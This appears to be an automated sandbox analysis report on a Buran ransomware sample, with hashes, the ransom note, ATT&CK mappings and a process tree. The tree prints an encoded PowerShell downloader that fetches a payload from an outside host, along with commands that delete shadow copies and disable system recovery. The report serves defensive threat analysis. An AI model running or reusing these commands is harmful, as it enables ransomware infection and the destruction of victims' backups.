buran | 84825c5810241c7a092119d19b92165b11774135d9557d7c54212bd6ccaa5a24

Analysis

max time kernel
150s
max time network
142s
platform
windows10_x64
resource
win10v20210408
submitted
11-08-2021 13:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3346.js
Size

530KB
MD5

7e23a9a840725f3431ef5825c6ab6839
SHA1

b9f307ac96ded5c42d931f7c4355756164ca0123
SHA256

09eeec589e425f4da6dc1587e49f7f32c17f4c9e026b10c2360e5b3f72699ca7
SHA512

51f027140d19f3b493d91a664d4c8bf2514b38c210f28178948a21d56fcde0ed99a068d7c0d04b9b3012ad03fc5be6e88d8e0f78aeb55bb919a2170a7e47da92

Score

10^/10

buran persistence ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: [email protected] Reserved email: [email protected] Reserved email: [email protected] Your personal ID: 12B-343-43A Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

[email protected]

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

13 2764 powershell.exe
15 2764 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

jbqvTZJz.exesmss.exesmss.exe

pid process

3924 jbqvTZJz.exe
4040 smss.exe
1148 smss.exe

flow	pid	process
13	2764	powershell.exe
15	2764	powershell.exe

pid	process
3924	jbqvTZJz.exe
4040	smss.exe
1148	smss.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

jbqvTZJz.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\smss.exe\" -start"	jbqvTZJz.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	jbqvTZJz.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

smss.exe

description	ioc	process
File opened (read-only)	\??\Z:	smss.exe
File opened (read-only)	\??\X:	smss.exe
File opened (read-only)	\??\V:	smss.exe
File opened (read-only)	\??\L:	smss.exe
File opened (read-only)	\??\J:	smss.exe
File opened (read-only)	\??\T:	smss.exe
File opened (read-only)	\??\S:	smss.exe
File opened (read-only)	\??\N:	smss.exe
File opened (read-only)	\??\H:	smss.exe
File opened (read-only)	\??\G:	smss.exe
File opened (read-only)	\??\B:	smss.exe
File opened (read-only)	\??\Y:	smss.exe
File opened (read-only)	\??\R:	smss.exe
File opened (read-only)	\??\P:	smss.exe
File opened (read-only)	\??\O:	smss.exe
File opened (read-only)	\??\K:	smss.exe
File opened (read-only)	\??\E:	smss.exe
File opened (read-only)	\??\W:	smss.exe
File opened (read-only)	\??\U:	smss.exe
File opened (read-only)	\??\Q:	smss.exe
File opened (read-only)	\??\M:	smss.exe
File opened (read-only)	\??\I:	smss.exe
File opened (read-only)	\??\F:	smss.exe
File opened (read-only)	\??\A:	smss.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 geoiptool.com

flow	ioc
17	geoiptool.com

Drops file in Program Files directory 64 IoCs

Processes:

smss.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp3-pl.xrm-ms	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-40.png	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js	smss.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	smss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME.txt	smss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-ppd.xrm-ms.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Trial-ul-oob.xrm-ms	smss.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-125_contrast-black.png	smss.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\view.html	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line_2x.png	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\ui-strings.js.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.kd8eby0.12B-343-43A	smss.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\openssl64.dlla.manifest.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected]	smss.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo	smss.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.contrast-black_scale-200.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\Movie-TVStoreLogo.scale-125.png	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js	smss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\MedTile.scale-125.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-16_altform-unplated_contrast-white.png	smss.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-sl\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ppd.xrm-ms.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-16.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-100_contrast-high.png	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\dcf.x-none.msi.16.x-none.vreg.dat	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupWideTile.scale-100.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\SmallTile.scale-200.png	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png	smss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo.png.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_CreateNotes_RTL_Tablet.mp4	smss.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	smss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\SUCTION.WAV	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\index.win32.bundle.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-64_contrast-white.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1h.png	smss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ppd.xrm-ms	smss.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\hi\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Cloud.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\it_16x11.png	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\ui-strings.js	smss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926306.profile.gz	smss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\Fireworks.jpg	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-48_altform-unplated.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-64_altform-unplated_contrast-white.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\LayersControl\Aerial.png	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\ui-strings.js.kd8eby0.12B-343-43A	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-64.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\ThirdPartyNotices_Arkadium.txt	smss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\13c.png	smss.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailSmallTile.scale-100.png	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png	smss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js.kd8eby0.12B-343-43A	smss.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

3124 vssadmin.exe
3272 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2764 powershell.exe
2764 powershell.exe
2764 powershell.exe

pid	process
3124	vssadmin.exe
3272	vssadmin.exe

pid	process
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exejbqvTZJz.exeWMIC.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeDebugPrivilege	3924	jbqvTZJz.exe
Token: SeDebugPrivilege	3924	jbqvTZJz.exe
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeSecurityPrivilege	2976	WMIC.exe
Token: SeTakeOwnershipPrivilege	2976	WMIC.exe
Token: SeLoadDriverPrivilege	2976	WMIC.exe
Token: SeSystemProfilePrivilege	2976	WMIC.exe
Token: SeSystemtimePrivilege	2976	WMIC.exe
Token: SeProfSingleProcessPrivilege	2976	WMIC.exe
Token: SeIncBasePriorityPrivilege	2976	WMIC.exe
Token: SeCreatePagefilePrivilege	2976	WMIC.exe
Token: SeBackupPrivilege	2976	WMIC.exe
Token: SeRestorePrivilege	2976	WMIC.exe
Token: SeShutdownPrivilege	2976	WMIC.exe
Token: SeDebugPrivilege	2976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2976	WMIC.exe
Token: SeRemoteShutdownPrivilege	2976	WMIC.exe
Token: SeUndockPrivilege	2976	WMIC.exe
Token: SeManageVolumePrivilege	2976	WMIC.exe
Token: 33	2976	WMIC.exe
Token: 34	2976	WMIC.exe
Token: 35	2976	WMIC.exe
Token: 36	2976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2892	WMIC.exe
Token: SeSecurityPrivilege	2892	WMIC.exe
Token: SeTakeOwnershipPrivilege	2892	WMIC.exe
Token: SeLoadDriverPrivilege	2892	WMIC.exe
Token: SeSystemProfilePrivilege	2892	WMIC.exe
Token: SeSystemtimePrivilege	2892	WMIC.exe
Token: SeProfSingleProcessPrivilege	2892	WMIC.exe
Token: SeIncBasePriorityPrivilege	2892	WMIC.exe
Token: SeCreatePagefilePrivilege	2892	WMIC.exe
Token: SeBackupPrivilege	2892	WMIC.exe
Token: SeRestorePrivilege	2892	WMIC.exe
Token: SeShutdownPrivilege	2892	WMIC.exe
Token: SeDebugPrivilege	2892	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2892	WMIC.exe
Token: SeRemoteShutdownPrivilege	2892	WMIC.exe
Token: SeUndockPrivilege	2892	WMIC.exe
Token: SeManageVolumePrivilege	2892	WMIC.exe
Token: 33	2892	WMIC.exe
Token: 34	2892	WMIC.exe
Token: 35	2892	WMIC.exe
Token: 36	2892	WMIC.exe
Token: SeBackupPrivilege	2352	vssvc.exe
Token: SeRestorePrivilege	2352	vssvc.exe
Token: SeAuditPrivilege	2352	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2892	WMIC.exe
Token: SeSecurityPrivilege	2892	WMIC.exe
Token: SeTakeOwnershipPrivilege	2892	WMIC.exe
Token: SeLoadDriverPrivilege	2892	WMIC.exe
Token: SeSystemProfilePrivilege	2892	WMIC.exe
Token: SeSystemtimePrivilege	2892	WMIC.exe
Token: SeProfSingleProcessPrivilege	2892	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeIncBasePriorityPrivilege	2892	WMIC.exe
Token: SeSecurityPrivilege	2976	WMIC.exe
Token: SeCreatePagefilePrivilege	2892	WMIC.exe
Token: SeBackupPrivilege	2892	WMIC.exe
Token: SeTakeOwnershipPrivilege	2976	WMIC.exe
Token: SeRestorePrivilege	2892	WMIC.exe
Token: SeLoadDriverPrivilege	2976	WMIC.exe
Token: SeShutdownPrivilege	2892	WMIC.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

wscript.execmd.exepowershell.exejbqvTZJz.exesmss.execmd.execmd.execmd.exe

description	pid	process	target process
PID 568 wrote to memory of 2960	568	wscript.exe	cmd.exe
PID 568 wrote to memory of 2960	568	wscript.exe	cmd.exe
PID 2960 wrote to memory of 2764	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 2764	2960	cmd.exe	powershell.exe
PID 2764 wrote to memory of 3924	2764	powershell.exe	jbqvTZJz.exe
PID 2764 wrote to memory of 3924	2764	powershell.exe	jbqvTZJz.exe
PID 2764 wrote to memory of 3924	2764	powershell.exe	jbqvTZJz.exe
PID 3924 wrote to memory of 4040	3924	jbqvTZJz.exe	smss.exe
PID 3924 wrote to memory of 4040	3924	jbqvTZJz.exe	smss.exe
PID 3924 wrote to memory of 4040	3924	jbqvTZJz.exe	smss.exe
PID 3924 wrote to memory of 3588	3924	jbqvTZJz.exe	notepad.exe
PID 3924 wrote to memory of 3588	3924	jbqvTZJz.exe	notepad.exe
PID 3924 wrote to memory of 3588	3924	jbqvTZJz.exe	notepad.exe
PID 3924 wrote to memory of 3588	3924	jbqvTZJz.exe	notepad.exe
PID 3924 wrote to memory of 3588	3924	jbqvTZJz.exe	notepad.exe
PID 3924 wrote to memory of 3588	3924	jbqvTZJz.exe	notepad.exe
PID 4040 wrote to memory of 1824	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 1824	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 1824	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 3604	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 3604	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 3604	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 1900	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 1900	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 1900	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 3732	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 3732	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 3732	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 3032	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 3032	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 3032	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 2832	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 2832	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 2832	4040	smss.exe	cmd.exe
PID 4040 wrote to memory of 1148	4040	smss.exe	smss.exe
PID 4040 wrote to memory of 1148	4040	smss.exe	smss.exe
PID 4040 wrote to memory of 1148	4040	smss.exe	smss.exe
PID 3032 wrote to memory of 3124	3032	cmd.exe	vssadmin.exe
PID 3032 wrote to memory of 3124	3032	cmd.exe	vssadmin.exe
PID 3032 wrote to memory of 3124	3032	cmd.exe	vssadmin.exe
PID 2832 wrote to memory of 2892	2832	cmd.exe	WMIC.exe
PID 2832 wrote to memory of 2892	2832	cmd.exe	WMIC.exe
PID 2832 wrote to memory of 2892	2832	cmd.exe	WMIC.exe
PID 1824 wrote to memory of 2976	1824	cmd.exe	WMIC.exe
PID 1824 wrote to memory of 2976	1824	cmd.exe	WMIC.exe
PID 1824 wrote to memory of 2976	1824	cmd.exe	WMIC.exe
PID 2832 wrote to memory of 3272	2832	cmd.exe	vssadmin.exe
PID 2832 wrote to memory of 3272	2832	cmd.exe	vssadmin.exe
PID 2832 wrote to memory of 3272	2832	cmd.exe	vssadmin.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\3346.js
1⤵
- Suspicious use of WriteProcessMemory
PID:568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe
      "C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3924
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of WriteProcessMemory
        
        PID:4040
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1824
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
        6⤵
        
        PID:3604
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
        6⤵
        
        PID:1900
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
        6⤵
        
        PID:3732
      - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 0
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:1148
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2832
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2892
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        7⤵
        Interacts with shadow copies
        
        PID:3272
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3032
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        7⤵
        Interacts with shadow copies
        
        PID:3124
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad.exe
        5⤵
        
        PID:3588

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

MD5
3903600a51d4f986b4302a602d42634b

SHA1
0ffcdcba49bfe7ed35695bc6092d72eae2db457b

SHA256
b509c38c1328732e6b2cf75fe5baa76764a6c5aaea721da222b5caaaac4ecc8e

SHA512
459d03ff9961ebf926e591ed4fd08cfd0f5ec1518b16427ad7b2f1bdf5c6f2188b1f288dafcbcf4620a8a7c53ec4c995fc31cf1329bebf6dec7cc88ae33a7b4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

MD5
3c9ad8d57554c33ab612c69aef4ce7e1

SHA1
93f176d8825c9b8b70bb040079b4497457d04b82

SHA256
d21639d8e234be42f0db58da90ef5852064bd2b98f88c7c848d672bf8bbd1ece

SHA512
94791fcc6564db7929e2f3ea7c1c093872df24728561320e5341b9e8b7088e2b53a3c71e6e4bcd34663860a490875a7c285e9ba0990afb83388da9214af1362e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
3e9f22cc690a8f0a85c77641e868fa63

SHA1
fe20510f5f24bdcf66183653b9b8b4f12581530c

SHA256
